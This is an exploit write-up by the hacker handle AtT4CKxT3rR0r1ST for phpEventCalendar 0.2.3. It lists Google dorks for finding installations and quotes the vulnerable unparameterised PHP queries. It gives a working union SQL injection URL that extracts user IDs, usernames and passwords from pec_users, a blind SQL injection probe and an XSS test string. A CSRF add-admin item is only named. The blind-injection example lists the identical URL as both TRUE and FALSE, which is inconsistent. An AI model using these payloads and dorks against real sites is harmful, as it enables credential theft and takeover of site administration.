phpEventCalendar v.0.2.3 Multiple Vulnerabilities ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpcodeworks.com/pec/downloads .:. Dork : [1]"phpEventGallery by ikemcg at ikemcg.com" [2]"phpEventCalendar by ikemcg at ikemcg.com" #################################################################### 1:SQL INJECTION: (http://www.exploit-db.com/exploits/4135/) ######################################## 1-VULNERABILITY: CLASSIC MYSQL INJECTION ######################################## /eventdisplay.php (LINE: 12-14) ----------------------------------------------------------------------------- $sql = "SELECT d, m, y FROM " . DB_TABLE_PREFIX . "mssgs WHERE id=" . $id; $result = mysql_query($sql) or die(mysql_error()); $row = mysql_fetch_array($result); ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### http://localhost/phpEventCalendar/eventdisplay.php?id=1+and+1=2+union+select+concat(uid,0x3a,username,0x3a,password),2,3+from+pec_users ----------------------------------------------------------------------------- ###################################### 2-VULNERABILITY: BLIND MYSQL INJECTION ###################################### /eventform.php (LINE: 17-23) ----------------------------------------------------------------------------- mysql_connect(DB_HOST, DB_USER, DB_PASS) or die(mysql_error()); mysql_select_db(DB_NAME) or die(mysql_error()); $sql = "SELECT uid FROM " . DB_TABLE_PREFIX . "mssgs WHERE id = $id"; $result = mysql_query($sql) or die(mysql_error()); $row = mysql_fetch_assoc($result); ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### http://localhost/phpEventCalendar/eventform.php?id=1+and+substring(@@version,1,1)=5 << TRUE http://localhost/phpEventCalendar/eventform.php?id=1+and+substring(@@version,1,1)=5 << FALSE ----------------------------------------------------------------------------- 2:CSRF[ ADD ADMIN ] ######################################## ----------------------------------------------------------------------------- 3:Multiple Cross-Site Scripting ######################################## http://localhost/phpEventCalendar/eventform.php?id='"()%26%251